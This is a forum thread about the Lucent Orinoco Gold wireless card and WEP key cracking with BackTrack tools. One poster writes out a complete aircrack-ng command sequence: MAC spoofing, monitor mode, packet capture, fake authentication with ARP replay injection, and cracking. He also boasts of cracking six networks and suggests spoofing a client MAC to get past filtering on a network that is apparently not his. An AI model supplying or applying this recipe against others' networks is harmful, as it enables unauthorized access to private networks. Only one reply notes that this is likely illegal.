Lucent Orinoco Classic GOLD 802.11b

[samsung]

has anyone had any success with this?? i bought this other day & just found out on the backtrack website "Works perfectly out of the box. However, this card doesn't support packet injection because it is Hermes I based. It is perfect for wardriving and sniffing wireless networks though" is this so??

I loaded it up & ran airmon-ng stop eth1, airmon-ng start eth0
shows that monitor mode is enabled
i then go to do an airodump-ng start eth1 or eth0 & it fails i dont remember the exact msg cos am working now - but it's something like unable to set monitor mode even though it clearly is in monitor mode & also kismet works - so how is this?

I have had some sucess using NetGear WG511T (but still tryin 2 hack my router at 128) - not easy when no clients

as always, any feed back appreciated

[goldmercury]

i had the orioco gold and gave up on it becuase the driver needs patched to inject. As I'm a linux noob and could not get BT installed to hd patching the driver was becoming a headache.

Got a netgear WG511T and followed xploit's tutorials, cracked 6 networks since yesterday. The netgear works out the box. Flawless.

Have scripted xploits tutorial after collecting around 3000000 ivs I cracked my 128 bit wep with some very strange characters in it.

Wep crack commands.
1. Put card in monitor mode.
Airmon-ng stop ath0
ifconfig wifi0 down
macchanger -–mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0

2. Find networks
Airodump-ng ath0
ctrl + c
3. Write monitored stuff to a file
Airodump-ng –c CHANNEL –w FILE -–bssid MAC OF AP ath0
4. Fake authenticate & inject (open new shell whilst running airodump)
Aireplay-ng -1 0 –e NETWORK NAME–a MAC OF AP –h 00:11:22:33:44:55 ath0
Aireplay-ng -3 –b MAC OF AP –h 00:11:22:33:44:55 ath0
Wait for around 250k-300k of data
5. Crack the file
Aircrack-ng NAME OF FILE

Finish!

It is too easy once you cn get backtrack running on a laptop with the correct hardware. Infact thats the most difficult part!

[theprez98]

However, this card doesn't support packet injection because it is Hermes I based. It is perfect for wardriving and sniffing wireless networks though" is this so??

This is correct.

This card does not support injection.

It is generally considered a great card for wardriving because its excellent SNR reporting (particularly in Windows' NetStumbler).

These two are not mutually exclusive, as wardriving has nothing to do with injecting packets.

[samsung]

Hey Goldmercury

where you say here
"Wait for around 250k-300k of data"
How long were you waiting & had you a client on the network generating packets - or just using the fake as i have done this also without clients & was waiting ages up to 30 mins with around 100K packets sent & recieved & around 100K ARP - but the IVS weren't increasing all that fast

any ideas?

tks

[goldmercury]

probably took about 15 minutes, I don't specify the --ivs switch just collect all data

took a little playing around before I got aircrack to crack the file, I think this had to do with either

no dumping the fake authentication to the file (though I'm not sure as on this?)

I do have a network that I can't crack and am getting hardly any dat from it, I think it may have a mac filter on it.

In this case you'll probably have to listen out for a client on the network and spoof it using mac changer, again don't quote me on this as I'm only 5 day old virign to backtrack.

[samsung]

tks for update,

am gona have a play about with it tonight & see how i get on, having said that i cracked my router on 64bit wep key in 3 mins, - but i had my pda also connected this was generating packets.

[theprez98]

I do have a network that I can't crack and am getting hardly any dat from it, I think it may have a mac filter on it.

If this is your network, you'd know if it had mac filtering or not.

If its not your network, you're probably better off not discussing what methods you're using to crack it, since it's probably against the law.

[goldmercury]

good point